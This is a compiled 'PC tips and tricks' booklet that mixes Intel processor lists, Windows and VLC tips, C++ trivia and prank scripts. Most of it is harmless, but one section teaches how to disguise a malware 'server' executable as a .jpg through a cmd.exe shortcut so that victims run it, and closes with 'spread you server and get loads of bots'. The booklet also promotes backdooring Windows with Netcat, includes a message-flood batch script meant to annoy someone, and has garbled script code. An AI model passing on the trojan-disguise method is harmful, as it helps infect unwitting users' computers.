 64 Kb L1 cache
 512 Kb L2 cache
 4 MB L3 cache
 Introduced January, 2010
 Socket 1156 LGA
 2-channel DDR3
 Integrated HD GPU
 AES Support
 Variants
 650/655K – 3.2 GHz Hyper-Threading Turbo Boost
 660/661 – 3.33 GHz Hyper-Threading Turbo Boost
 670 – 3.46 GHz Hyper-Threading Turbo Boost
 680 – 3.60 GHz Hyper-Threading Turbo Boost
Core i7:

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

 Bloomfield – 45 nm process technology


 4 physical cores
 256 KB L2 cache
 8 MB L3 cache
 Front side bus replaced with QuickPath up to 6.4GT/s
 Hyper-Threading is again included. This had previously been removed at the
introduction of Core line
 781 million transistors
 Intel Turbo Boost Technology
 TDP 130W
 Introduced November 17, 2008
 Socket 1366 LGA
 3-channel DDR3
 Variants
 975 (extreme edition) – 3.33 GHz/3.60 GHz Turbo Boost
 965 (extreme edition) – 3.20 GHz/3.46 GHz Turbo Boost
 960 – 3.20 GHz/3.46 GHz Turbo Boost
 950 – 3.06 GHz/3.33 GHz Turbo Boost
 940 – 2.93 GHz/3.20 GHz Turbo Boost
 930 – 2.80 GHz/3.06 GHz Turbo Boost
 920 – 2.66 GHz/2.93 GHz Turbo Boost
 Lynnfield – 45 nm process technology
 4 physical cores
 256 KB L2 cache
 8 MB L3 cache
 No QuickPath, instead compatible with slower DMI interface
 Hyper-Threading is included
 Introduced September 8, 2009
 Socket 1156 LGA
 2-channel DDR3
 Variants
 880 – 3.06 GHz/3.73 GHz Turbo Boost (TDP 95W)
 870/875K – 2.93 GHz/3.60 GHz Turbo Boost (TDP 95W)
 870S – 2.67 GHz/3.60 GHz Turbo Boost (TDP 82W)

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

 860 – 2.80 GHz/3.46 GHz Turbo Boost (TDP 95W)


 860S – 2.53 GHz/3.46 GHz Turbo Boost (TDP 82W)
TODO: Westmere

 Gulftown – 32 nm process technology


 6 physical cores
 256 KB L2 cache
 12 MB L3 cache
 Front side bus replaced with QuickPath up to 6.4GT/s
 Hyper-Threading is included
 Intel Turbo Boost Technology
 Socket 1366 LGA
 TDP 130W
 Introduced 16 March 2010
 Variants
 990X Extreme Edition – 3.46 GHz/3.73 GHz Turbo Boost
 980X Extreme Edition – 3.33 GHz/3.60 GHz Turbo Boost
 970 – 3.20 GHz/3.46 GHz Turbo Boost

 Clarksfield – Intel Core i7 Mobile Processor Family – 45 nm process technology


 4 physical cores
 Hyper-Threading is included
 Intel Turbo Boost Technology
 Variants
 940XM Extreme Edition – 2.13 GHz/3.33 GHz Turbo Boost (8 MB L3, TDP
55W)
 920XM Extreme Edition – 2.00 GHz/3.20 GHz Turbo Boost (8 MB L3, TDP
55W)
 840QM – 1.86 GHz/3.20 GHz Turbo Boost (8 MB L3, TDP 45W)
 820QM – 1.73 GHz/3.06 GHz Turbo Boost (8 MB L3, TDP 45W)
 740QM – 1.73 GHz/2.93 GHz Turbo Boost (6 MB L3, TDP 45W)
 720QM – 1.60 GHz/2.80 GHz Turbo Boost (6 MB L3, TDP 45W)
Xeon:
 Gainestown – 45 nm process technology

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

 Same processor dies as Bloomfield


 256 KB L2 cache
 8 MB L3 cache, 4MB may be disabled
 QuickPath up to 6.4GT/s
 Hyper-Threading is included in some models
 781 million transistors
 Introduced March 29, 2009
 Variants
 W5590, W5580, X5570, X5560, X5550, E5540, E5530, L5530, E5520,
L5520, L5518 – 4 cores, 8 MB L3 cache, HT
 E5506, L5506, E5504 – 4 cores, 4 MB L3 cache, no HT
 L5508, E5502, E5502 – 2 cores, 4 MB L3 cache, no HT

64-bit processors: Intel 64 – Haswell microarchitecture[edit]


 See Haswell (microarchitecture)
Intel 805xx product codes[edit]
Intel discontinued the use of part numbers such as 80486 in the marketing of
mainstream x86-architecture microprocessors with the introduction of
the Pentium brand in 1993. However, numerical codes, in the 805xx range, continued to
be assigned to these processors for internal and part numbering uses. The following is
a list of such product codes in numerical order:

Product
Marketing name(s) Codename(s)
code

80500 Pentium P5 (A-step)

80501 Pentium P5

80502 Pentium P54C, P54CS

80503 Pentium with MMX Technology P55C, Tillamook

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

80521 Pentium Pro P6

80522 Pentium II Klamath

80523 Pentium II, Celeron, Pentium II Xeon Deschutes, Covington, Drake

80524 Pentium II, Celeron Dixon, Mendocino

80525 Pentium III, Pentium III Xeon Katmai, Tanner

80526 Pentium III, Celeron, Pentium III Xeon Coppermine, Cascades


80528 Pentium 4, Xeon Willamette (Socket 423), Foster
80529 Canceled Timna
80530 Pentium III, Celeron Tualatin
80531 Pentium 4, Celeron Willamette (Socket 478)
80532 Pentium 4, Celeron, Xeon Northwood, Prestonia, Gallatin
80533 Pentium III Coppermine (cD0-step)
80534 Pentium 4 SFF Northwood (small form factor)
80535 Pentium M, Celeron M 310–340 Banias
80536 Pentium M, Celeron M 350–390 Dothan
80537 Core 2 Duo T5xxx, T7xxx, Celeron M 5xx Merom
80538 Core Solo, Celeron M 4xx Yonah
80539 Core Duo, Pentium Dual-core T-series Yonah
80541 Itanium Merced
80542 Itanium 2 McKinley
80543 Itanium 2 Madison
Prescott (Socket 478), Nocona,
80546 Pentium 4, Celeron D, Xeon
Irwindale, Cranford, Potomac
80547 Pentium 4, Celeron D Prescott (LGA 775)

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

80548 Canceled Tejas and Jayhawk


80549 Itanium 2 90xx Montecito
80550 Dual-core Xeon 71xx Tulsa
80551 Pentium D, Pentium EE, Dual-core Xeon Smithfield, Paxville DP
80552 Pentium 4, Celeron D Cedar Mill
80553 Pentium D, Pentium EE Presler
80554 Celeron 800/900/1000 ULV Shelton
80555 Dual-core Xeon 50xx Dempsey
80556 Dual-core Xeon 51xx Woodcrest
Core 2 Duo E4xxx. E6xxx, Dual-core Xeon
80557 Conroe
30xx, Pentium Dual-core E2xxx
80560 Dual-core Xeon 70xx Paxville MP
Core 2 Quad, Core 2 Extreme QX6xxx,
80562 Kentsfield
Quad-core Xeon 32xx
80563 Quad-core Xeon 53xx Clovertown
80564 Xeon 7200 Tigerton-DC
80565 Xeon 7300 Tigerton
80566 Atom Z5xx Silverthorne
80567 Itanium 91xx Montvale
Core 2 Quad Q9xxx, Core 2 Extreme
80569 Yorkfield
QX9xxx, Xeon 33xx
80570 Core 2 Duo E8xxx, Xeon 31xx Wolfdale
Core 2 Duo E7xxx, Pentium Dual-core
80571 Wolfdale-3M
E5xxx, Pentium Dual-core E2210
80573 Xeon 5200 Wolfdale-DP
80574 Core 2 Extreme QX9775, Xeon 5400 Harpertown
Core 2 Duo P7xxx, T8xxx, P8xxx, T9xxx,
80576 P9xxx, SL9xxx, SP9xxx, Core 2 Extreme Penryn
X9xxx
Core 2 Duo P7xxx, P8xxx, SU9xxx, T6xxx,
80577 Penryn-3M
T8xxx
80578 EP80578 Vermilion Range
80579 EP80579 Tolapai
80580 Core 2 Quad Q8xxx, Q9xxx, Xeon 33xx Yorkfield-6M

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

80581 Core 2 Quad Q9xxx Penryn-QC


80582 Xeon 74xx Dunnington
80583 Xeon 74xx Dunnington-QC
80584 Xeon X33x3 LV Yorkfield CL
80585 Core 2 Solo SU3xxx, Celeron 7xx, 9xx Penryn-L
80586 Atom 2xx, N2xx Diamondville
80587 Atom 3xx Diamondville DC
80588 Xeon L3014, E3113 Wolfdale-CL

Intel 806xx product codes[edit]

Product
Marketing name(s) Codename(s)
code

80601 Core i7, Xeon 35xx Bloomfield

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

80602 Xeon 55xx Gainestown

80603 Itanium 93xx Tukwila

80604 Xeon 65xx, Xeon 75xx Beckton

80605 Core i5-7xx, Core i7-8xx, Xeon 34xx Lynnfield

80606 Canceled Havendale

Core i7-7xx QM, Core i7-8xx QM,


80607 Clarksfield
Core i7-9xx XM

80608 Canceled Auburndale

80609 Atom Z6xx Lincroft

80610 Atom N400, D400, D500 Pineview

80611 Canceled Larrabee

80612 Xeon C35xx, Xeon C55xx Jasper Forest

80613 Core i7-9xxX, Xeon 36xx Gulftown

80614 Xeon 56xx Westmere-EP

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

Xeon E7-28xx, Xeon E7-48xx, Xeon


80615 Westmere-EX
E7-88xx

Pentium G6xxx, Core i3-5xx, Core i5-


80616 Clarkdale
6xx

80617 Core i5-5xx, Core i7-6xxM/UM/LM Arrandale

80618 Atom E6x0 Tunnel Creek

80619 Core i7-3xxx Sandy Bridge-EP

80620 Xeon E5-24xx Sandy Bridge-EN

Xeon E5-16xx, Xeon E5-26xx, Xeon Sandy Bridge-EP-8, Sandy Bridge-


80621
E5-46xx EP-4

80622 Sandy Bridge-EP-8

Xeon E3-xxxx, Core i3/i5/i7-2xxx, Sandy Bridge-HE-4, Sandy Bridge-


80623
Pentium Gxxx, Xeon E3-12xx M-2

Core i3/i5/i7-2xxxM, Pentium Bxxx, Sandy Bridge-HE-4, Sandy Bridge-


80627
Celeron Bxxx H-2, Sandy Bridge-M-2

80631 Itanium 95xx Poulson

80632 Atom E6x5C Stellarton

80637 Core i5/i7-3xxx, Xeon-E3 Ivy Bridge

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

80638 Mobile Core i5/i7-3xxxM Ivy Bridge

80640 Atom Z24xx Penwell

80641 Atom D2xxx, Atom N2xxx Cedarview

80647 Core i5/i7 - 4xxx Haswell

80649 Xeon Phi Knight's Corner

80650 Atom Z27xx Cloverview

Disco keyboard light

This trick just makes your keyboard lights go crazy and do disco. LoL.

The script I’m sharing with you, when executed makes your Caps, Num and Scroll
Lock’s light flash ina cool rhythmic way!

1.This piece of code makes ur keyboard a live disco..


Set wshShell =wscript.Create Object(“WScript .Shell”)
do
wscript.sleep 100
BY: KHALID CHAUDHARY
PC TIPS AND TRICK

wshshell.sendke ys “{CAPSLOCK}”
wshshell.sendke ys “{NUMLOCK}”
wshshell.sendke ys “{SCROLLLOCK}”
loop

2.This one makes it looks like a chain of light….

Set wshShell =wscript.Create Object(“WScript .Shell”)


do
wscript.sleep 200
wshshell.sendke ys “{CAPSLOCK}”
wscript.sleep 100
wshshell.sendke ys “{NUMLOCK}”
wscript.sleep 50
wshshell.sendke ys “{SCROLLLOCK}”
loop
Instructions:

*paste any of the two above codes in notepad


*Save as “AnyFileName”.v bs
*Run the file
*To stop, launch task manager and then under “Processes” end “wscript.exe”
Tips to recover scratched CD's

1. Spread a cloth on a flat surface and place the CD on it.


2. Then, hold the disc with one hand, use the other to wipe the polish into the
affected area with a soft cloth.
3. Wait for it to dry and buff using short, brisk strokes along the scratch, not
across it.
4. A cloth sold to wipe spectacles or camera lenses will work super m8's.
5. When you can no longersee the scratch,, wash the disc with water and let it dry
before playing. Intersting isnt it? Try it right now

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

I have used toothpaste with good effects before Ive also used car paint cutting
compound on deeper scratches. It does leave lots of smaller scratches (as it is a
cutting compound after all) but it will remove the worst scratches in most cases.
ya u r gng to b surely befinited by this Operation

Tips To Remove Software Properly From Your PC !!!


The IT industry can be pretty daunting without proper education. Creighton online
programs can help anyone properly prepare to be highly successful in the tech
world. There are many software programs available in themarket, which are not
heavy, but eats up more space when you check after installation. It is because you
did not read the instructions when you started installing it. They actually have
some paired toolbars or some other software that took more drive space. The
result is that your system becomes very slow and you definitely like to uninstall
unwanted software from your PC.

Tips to Remove / Uninstall Software


Here are some handy tips for you, by following which you can properly remove
any software from your machine:

>>> The simplest way to remove software from your machine is to remove it from
control panel that any unprofessional computer user can also do. But, for your
convenience, we have mentioned in proper steps. Byfollowing these steps, you
can easily uninstall any software from your PC:

>> Click on Start button

>>Then, select Control panel and look for Add/ Remove Programs

>>A list will appear (here, you can select any program that you wish to uninstall
from your PC)

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

>>Right click on your desired software and select “Uninstall” (It will take some
time to uninstall. So, wait until the uninstall process is completed.)

>>After the process is complete, you should restart your PC (if asked by the
software after uninstallation).

And here you go; you have uninstalled the software that was troubling you.
Hopefully, this will work perfect, but if itdid not work, then you can use the next
alternative way(s):

>>> A person who uses his computer 20+ hours a day, it’s really annoying for him
when suddenly his PC starts working very slow. Many of you may already have
some idea of why some of our uninstalled programs still reside in our PC’s
registry. It is because some entries still stay in our windows registry and will stay
there until you remove them manually. To modify/ remove registry, go to “Run”
and then type “Regedit”. And in Regedit, you can make changes related to your
desired software, but if you are not a computer professional, then DO NOT mess
with the registry, because it will create more problems if you un-intentionally
remove/modify the wrong entries.

>>> There is hardly any problem in the online scenario that cannot be resolved by
software. There are also many uninstallers available that you can use to uninstall
specific programs. Also, there are numerous software applications that provide
their own uninstallers with installation packages and you can use them to remove
software completely. The advantage of using these uninstallers is that they
exactly know where your installed software had made changes in your system.
When you start searching about some software uninstallers, you will see many
uninstallers and it will become very difficult to select the perfect one. For this,
your can also get recommendations from your friends or computer professionals
via any forum.

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

By following these tips, you can easily uninstall your problematic software from
your PC that create problems.

OLD BUT AWESOME MAGIC

Open VLC player


Press Ctrl + N
Now type "screen://" (without space and quotes )
and then see

How to Hide your .exe file in a .jpg

This may be helpful for some people

1. Firstly, create a new folder and make sure that the options 'show hidden files' is
checked and “hide extensions for known file types is unchecked. Basically what u
need is to see hidden files and see the extension of all your files on your pc.

2. Paste a copy of your server on the new created folder. let's say
it's called server.exe (that's why you need the extension of files
showing, cause you need to see it to change it)

3. Now you’re going to rename this server.exe to whatever you want, let us say
for example picture.jpeg

4. Windows is going to warn you if you really want to change this extension from
exe to jpeg, click YES.

5. Now create a shortcut of this picture.jpeg in the same folder.

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

6. Now that you have a shortcut, rename it to whatever you want, for example,
me.jpeg.

7. Go to properties (on file me.jpeg) and now you need to do some changes there.

8. First of all delete all the text on field START IN and leave it empty.

9. Then on field TARGET you need to write the path to open the other file (the
server renamed picture.jpeg) so u have to write this: C:\WINDOWS\system32\
cmd.exe /c picture.jpeg

10. The last field, c picture.jpeg is always the name of the first
file. If you called the first file soccer.avi you gotta write
C:\WINDOWS\system32\cmd.exe /c soccer.avi got it?

11. So what you are doing is when someone clicks on me.jpeg, a cmd will execute
the other file picture.jpeg and the server will run.

12. On that file me.jpeg (shortcut), go to properties and you have an option to
change the icon. Click that and a new window will pop up and u have to write this:
%SystemRoot%\system32\SHELL32.dll. Then press OK.

13. You can set the properties HIDDEN for the first file (picture.jpeg) if you think
better to get a connection from someone.

14. But dont forget one thing, these 2 files must always be together in the same
folder and to get connected to someone they must click on the shortcut created
not on the first file. So rename the files to whatever you want considering the
person and the knowledge they have on this matter.

Thats it spread you server and get loads of bots.

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

Have you watched our Latest Video :

Backdooring Windows 7 with Netcat :


This may be helpful for some people

TO INCREASE YOUR PC SPEED


STEPS 1-TO CLEAN YOUR TEMPEROTY FILE (TYPE ON START search box "%temp%"
and enter then delete the temp files )

steps 2:-to close the running program from startup type( "msconfig" then enter
and go to startup and desable the unwanted program )
steps 3:-clean the disk go to my computer and clean up your disk ...

Did you know you can change the colour of cmd


1. Open CMD
2. Write: color 0=Black 1=Blue 2=Green 3=Sea Blue 4=Red 5=Purple 6=Yellow
7=White 8=Grey 9=Light Blue A=Cyan B=Light Sea Blue C=Light Red D= Light
Purple E=Light Yellow F=Bright White

But if you want to change background:

1.Open CMD
2.Write for example: color fc f is for background and c for the letters...
The colors are the same as the previous

To Lock a folder in windows XP/7 without any software

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

1. Make a Folder in C drive rename it as "abc" without quotes.

2. Now open Command Prompt from Start Menu.

3. Type "attrib +s +h C:\abc" without quotes and press enter.

4. This command will Make your folder invisble and it can not be seen even in
hidden files and folders

5. To make it visible again type "attrib -s -h C:\abc"

6. You can lock any other folder also by changing the location C:\abc to address of
your folder.

To Unlock the hidden themes on Windows7,

1. Open Windows Explorer


2. Click Organize , and select folder and
search Options.
3. Select show hidden files, folder and
drivers and uncheck Hide Protected
operating system file (Recommended). If
prompted with conformation click Yes
5. Click Ok
6. Browse the following folder: C:\windows
\Globlization\MCT\
7. There are five folder in the name with
format MCT-XX (Where XX is AU, CA, GB, or
ZA)which prepresents globalization settings
for each region. Go in to the folder that you
want to active its theme.
NOTE: AU, CA and ZA regions have the
same themes.

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

8. Open the theme folder inside the selected


region folder.
9. Double click on the XX. theme file to
apply the theme to the windows desktop
System

Top - 10 Programming language currently Used:


1. Java – 35.7%
2. C, C++ – 15.3%
3. C# – 12.7%
4. Perl – 11.9%
5. JavaScript – 10.9%
6. Visual Basic .NET – 5.2%
7. PHP – 2.9%
8. Ajax – 2.7%
9. Python – 2.0%
10. Ruby – 0.7%

5 Hidden Features Of C++ That You May Find Interesting

1. While the ternary operator (?:) is well known, many don’t realise that it can
also be used as lvalues.

x = (y < 0) ? 10 : 20;
(a == 0 ? a : b) = 1;

Otherwise, you would be writing this as,

if (a == 0)

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

a = 1;
else
b = 1;

2. The namespace alias is pretty easy to miss. Once you know about it though, you
will start recognising it everywhere. It is especially useful when you’rr writing a
large code with a lot of namespace hierarchies.

namespace x = boost::filesystem;

x::path myPath(strPath, fs::native );

3. Variables aren’t the only ones that can be declared in the init part of functions.
You can also declare classes and other functions.

for(struct { int x; float y; } loop = { 1, 2 }; ...; ...) {


...
}

4. The unary + operator can be used in order to promote or decay a number of


things. See below for some examples.

+EnumeratorValue: This gives your enumerator value a perfect integer type,


which lets it fit its value. This is quite useful for implementing overloaded
operators for enumeration.

Passing a temporary value to a variable: You can create a temporary value for a
variable using this operator. For example, if you have a class that uses an in class
static initializer without any out of class definition, but sometimes the system fails
to link.

struct Foo {
static int const value = 42;
BY: KHALID CHAUDHARY
PC TIPS AND TRICK

};

template
void f(T const&);

int main() {
// fails to link and tries to get the address of "Foo::value"!
f(Foo::value);

// works - pass a temporary value


f(+Foo::value);
}

Decay an array to a pointer: The operator also works when you want to pass two
values to a function.

template
void f(T const& a, T const& b);

int main() {
int a[2];
int b[3];
f(a, b); // won't work! different values for "T"!
f(+a, +b); // works! T is "int*" both time
}

5. You must know the id/identity metafunction. Now check out this usecase for it,
which is for non-template cases.

// void (*f)(); // same


id::type *f;

// void (*f(void(*p)()))(int); // same


BY: KHALID CHAUDHARY
PC TIPS AND TRICK

id::type *f(id::type *p);

// int (*p)[2] = new int[10][2]; // same


id::type *p = new int[10][2];

// void (C::*p)(int) = 0; // same


id::type C::*p = 0;

It helps decrypting C++ declarations greatly!

// boost::identity is pretty much the same


template
struct id { typedef T type; };

Top 10 tips to protect from hacker

Here is Top 10 list of steps you should take to protect your information and your
computing resources from the hackers of cyberspace..

• Back up everything! You are not invulnerable. Catastrophic data loss can happen
to you -- one worm or Trojan is all it takes.

• Choose passwords that are reasonably hard to guess -- don't just append a few
numbers to a no-brainer. Always change default passwords.
BY: KHALID CHAUDHARY
PC TIPS AND TRICK

• Use an antivirus product like AVG or Norton, and set it to update daily.

• Update your OS religiously and be vigilant in applying all security patches


released by the software manufacturer.

• Avoid hacker-bait apps like Internet Explorer and disable automatic scripting on
your e-mail client.

• Use encryption software like PGP (pretty good privacy) when sending sensitive
e-mail. You can also use it to protect your entire hard drive.

• Install a spyware detection app -- or even several. Programs that can be set to
run frequently, like SpyCop, are ideal.

• Use a personal firewall. Configure it to prevent other computers, networks and


sites from connecting to you, and specify which programs are allowed to connect
to the net automatically.

• Disable any system services you're not using, especially apps that could give
others remote access to your computer (like Remote Desktop, RealVNC and
NetBIOS).

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

• Secure your wireless networks. At home, enable WPA (Wi-Fi protected access)
with a password of at least 20 characters. Configure your laptop to connect in
Infrastructure mode only, and don't add networks unless they use WPA.

Trick to Make Wi-Fi Hotspot on Window using Notepad!!!


Follow these steps :

>Open Notepad and type paste below code into it.

netsh wlan set hostednetwork mode=allow


ssid=FreeWIFI key=12345
netsh wlan start hostednetwork

>Now you can change the SSID by changing code in blue color and you can change
the
security code in red color.
>Now make sure to save this file as Start.bat and its done.
>Now create another new Notepad file and paste below code into it.

netsh wlan stop hostednetwork

>Save this file as Stop.bat and your Wi-Fi Hotspot stopping process is up.
>So now when ever you want to start the Wi-Fi Hotspot simply double click the
Star.bat
file and your Wi-Fi hotspot will start to broadcast.
>As soon as you are done you can double click the Stop.bat file and your
broadcast
will be stopped.

Types Of Server

1. Real-Time Communication Servers


Also known as chat servers or IRC, and sometimes known as instant messaging
(IM) servers, these servers are meant to allow huge number users to exchange
information instantly.
BY: KHALID CHAUDHARY
PC TIPS AND TRICK

2. FTP Servers
This is one of the oldest of the Internet services available. The FTP or File Transfer
Protocol allows the users to securely transfer one or more files of any size
between two computers.

3. Collaboration Servers
In many ways, collaboration software, once called 'groupware,' demonstrates the
original power of the Web. Collaboration software designed to enable users to
collaborate, regardless of location, via the Internet or a corporate intranet and to
work together in a virtual atmosphere.

4. List Servers
List servers lets users better manage their mass mailing lists like open interactive
discussions or one-way lists to deliver newsletters, announcements or advertising.

5. Telnet Servers
The Telnet server lets the users on to a host computer control and work on
remote computers.

6. Web Servers
At its core, a Web server serves static content to a Web browser by loading a file
from a disk and serving it across the network to a user's Web browser. This entire
exchange is mediated by the browser and server talking to each other using HTTP.

7. Virtual Servers
A virtual server is a web server which shares its resources with multiple users. It's
another way of saying that multiple web sites share the resources of one server.

8. Proxy Servers
Proxy server is a server which acts as an intermediary for requests between the
users and the servers. Client connects to the proxy server and the proxy server
evaluates the requests sent by the users simplifies them and control their
BY: KHALID CHAUDHARY
PC TIPS AND TRICK

complexities.

9. Mail Servers
Mail servers help in moving and storing the e-mail over a network via LANs and
WANs or across the Internet.

10. Server Platforms


Normally used in same context with that of operating systems, server platforms
are the platforms that are under the hardware or software of a system and the
hence in the engine that drives the server.

11. Open Source Servers


Similar to server platforms, Open source server are referred to the underlying
open source operating system used in the IT infrastructures of the companies.

12. Application Servers


Application servers are a type of middleware which connects the database servers
and the app users.

Uninstall Program using Command Prompt in Windows

How to Uninstall Program using Command Prompt


in Windows Xp/7/8/8.1
In windows you can Uninstall an application using command
prompt (CMD) . its is also easy way to Uninstall any program or
Application . Sometime program does not Remove properly through
Add/Remove program then you can remove using Command
Prompt So Read the Full Post Carefully .

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

Follow these steps to Remove program using command


Prompt .

A. First Click on Start button then Type in search box CMD , and
then Press Enter . As Shown in Following Figure :

B. Now on the Command prompt windows , type wmic and then


press Enter Key . As Shown in Following Figure :

C. Now type Product get name and then press Enter . it will
Generate list of Installed Program . As Shown in Following Figure:

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

D. Now Type below command and Give exact name of program


which you want to remove .

Product where name="Program name" call uninstall .


and then press Enter .
As Shown in Following Figure

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

E. Now press Y to Confirm Uninstallation and then


Press Enter . As Shown in Following Figure

F. Now Program has been successfully uninstalled, Close Command


prompt windows .

Run Commands For windows xp

To run any of these apps go to Start >


Run and type the executable name (ie
charmap).
WINDOWS XP HIDDEN APPS:
=================================
========
1) Character Map = charmap.exe (very
useful for finding unusual characters)
2) Disk Cleanup = cleanmgr.exe
3) Clipboard Viewer = clipbrd.exe
(views contents of Windows clipboard)

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

4) Dr Watson = drwtsn32.exe
(Troubleshooting tool)
5) DirectX diagnosis = dxdiag.exe
(Diagnose & test DirectX, video &
sound cards)
6) Private character editor =
eudcedit.exe (allows creation or
modification of characters)
7) IExpress Wizard = iexpress.exe
(Create self-extracting / self-installing
package)
Microsoft Synchronization Manager
= mobsync.exe (appears to allow
synchronization of files on the
network for when working offline.
Apparently undocumented).
9) Windows Media Player 5.1 =
mplay32.exe (Retro version of Media
Player, very basic).
10) ODBC Data Source Administrator =
odbcad32.exe (something to do with
databases)
11) Object Packager = packager.exe (to
do with packaging objects for insertion
in files, appears to have
comprehensive help files).
12) System Monitor = perfmon.exe
(very useful, highly configurable tool,
tells you everything you ever wanted
to know about any aspect of PC
performance, for uber-geeks only )
13) Program Manager = progman.exe
(Legacy Windows 3.x desktop shell).
BY: KHALID CHAUDHARY
PC TIPS AND TRICK

14) Remote Access phone book =


rasphone.exe (documentation is
virtually non-existant).
15) Registry Editor = regedt32.exe [also
regedit.exe] (for hacking the Windows
Registry).
16) Network shared folder wizard =
shrpubw.exe (creates shared folders
on network).
17) File siganture verification tool =
sigverif.exe
18) Volume Contro = sndvol32.exe (I've
included this for those people that lose
it from the System Notification area).
19) System Configuration Editor =
sysedit.exe (modify System.ini &
Win.ini just like in Win98! ).
20) Syskey = syskey.exe (Secures XP
Account database - use with care, it's
virtually undocumented but it appears
to encrypt all passwords, I'm not sure
of the full implications).
21) Microsoft Telnet Client = telnet.exe
22) Driver Verifier Manager =
verifier.exe (seems to be a utility for
monitoring the actions of drivers,
might be useful for people having
driver problems. Undocumented).
23) Windows for Workgroups Chat =
winchat.exe (appears to be an old NT
utility to allow chat sessions over a
LAN, help files available).
24) System configuration =
BY: KHALID CHAUDHARY
PC TIPS AND TRICK

msconfig.exe (can use to control


starup programs)
25) gpedit.msc used to manage group
policies, and permissions[a very
powerful tool if you know how to use
it properly;-) ]
In order to run some of the above
mentioned programs, you need to
have an administrator groups account.
Each of this tools deserves an entire
tutorial of its own. Maybe soon i will
come up with some more fascinating
facts and tutorials about each of them.
Till then experiment with them a bit
and enjoy!!!!!!!!

Unlock Nokia Security Code

Guys I’ll teach u how to unlock Nokia security code. There r 3 methods to unlock Nokia
mobile security code:

1. Get Ur Nokia mobile codes using Ur IMEI No. For this download the Nokia mobile
calculator from the link at the end of this post. Insert Ur IMEI No. n press calculates u
will get list of codes for ur mobile at the right side.

2. Another method is so simple n easy. First download the 2nd file.


Open it n connects Ur Nokia mobile in PC Suite Mode.
Go to service tab n press get under "user code" frame.
Done. U can see the password at the right side.

3. This method is risky it'll delete all data n flash the mobile actually. I’ll teach u this
when i teach u how to flash a mobile on Ur own.

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

Download links -
1. - http://dc641.4shared.com/download/dCXyqY8T?tsid=20130603-143006-a0d24d0f

UPDATE YOUR STATUS IN BLUE COLOR:


Go o to update status link and paste below code, and change the text saying
'YOUR TEXT HERE' with your own text you want in blue color like,

@+[1: ]@@+[1:[0:1:Your Text Here ]]


(remove all the + sign)

Now after you have done writing your text click on Post ! you will have your status
in BlueColour.

Use on-screen keyboard for secured typing.

If u want to log in to your online bank a/c or some thing else and to not get
hacked by key loggers

----Press start button goto Run

----Type osk

----Press Enter

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

Infinite cycle of a messege

Using this notepad trick you can annoy anyone and can actually force them to log
off .
This notepad trick will create an infinite cycle of a message in the computer.
Follow the steps to know more:

>Open Notepad.
> Copy the below mentioned text in your notepad file:

@echo off
:BEGIN
msg * Welcome
msg * To
msg * Pc TiPs AnD TriCkS
msg * Thanks for visiting
goto BEGIN

>Save the file with .bat extension like message.bat. After saving the file just open
it (by double clicking) and see what happens..........

VLC Media Player Keyboard Shortcuts


F ↔ Full Screen
Space ↔ Play/Pause
T ↔ Show Position/Time
S ↔ Stop Ctrl + Q ↔ Quit
+/- ↔ Faster/Slower
N/P ↔ Next/Previous
Ctrl+up ↔ Volume Up
Ctrl+down ↔ Volume Down
CTRL + E ↔ To Adjust Audio/Video Effects Ctrl+ H ↔ To Hide/Unhide Controls

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

M ↔ Mute
Z Zoom Mode
Ctrl+Right/Left ↔ To Skip a 1 minute in
the Audio/
Video T ↔ Check remaining Time in Video
Ctrl+O ↔ Open Single File
Esc ↔ Exit Full Screen
A ↔ Aspect ratio
B ↔ Audio Track Cycle
C ↔ Crop Screen Shift+s ↔ Capture Photo
Shift+r ↔ Recording Video
F11 ↔ Windows Full Screen

VLC Media Player Keyboard Shortcuts

Shortcut Key/Keys Function

F Full Screen

Space Play/Pause

T Show Position/Time

S Stop

Ctrl + Q Quit

+/- Faster/Slower

N/P Next/Previous

Ctrl+up Volume Up

Ctrl+down Volume Down

CTRL + E To Adjust Audio/Video Effects

Ctrl+ H To Hide/Unhide Controls


BY: KHALID CHAUDHARY
PC TIPS AND TRICK

M Mute

Z Zoom Mode

Ctrl+Right/Left To Skip a 1 minute in the Audio/Video

T Check remaining Time in Video

Ctrl+O Open Single File

Esc Exit Full Screen

A Aspect ratio

B Audio Track Cycle

C Crop Screen

Shift+s Capture Photo

Shift+r Recording Video

F11 Windows Full Screen

Watch Live TV on Your PC For Free

Now you can watch free Tv on your pc by just using a VLC player.

Step 1 : First of all you need to have VLC player, if you don’t have vlc player kindly
download and install it

Step 2 : Now open Vlc Player, and select streaming option from the media menu
present in the menu bar.

Step 3 : Select network option and enter the url of the streaming channel. For
example if you want to view B4u Music you need to add url
rtsp://217.146.95.166:554/playlist/ch12zqcif.3gp
in the url field and then select play option from the stream drop down menu.

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

Step 4 : After you click play in the above step, the channel will start streaming and
you can watch your favorite channels.

Here is the List of many other channels which you will love to watch
Channel Name
Link
NDTV rtsp://ss1c6.idc.mundu.tv:554/prf0/cid_33.sdp
NDTV Profit rtsp://ss1c6.idc.mundu.tv:554/prf0/cid_31.sdp
Times Now rtsp://ss1c6.idc.mundu.tv:554/prf0/cid_2.sdp
Aaj Tak rtsp://ss1c6.idc.mundu.tv:554/prf0/cid_4.sdp
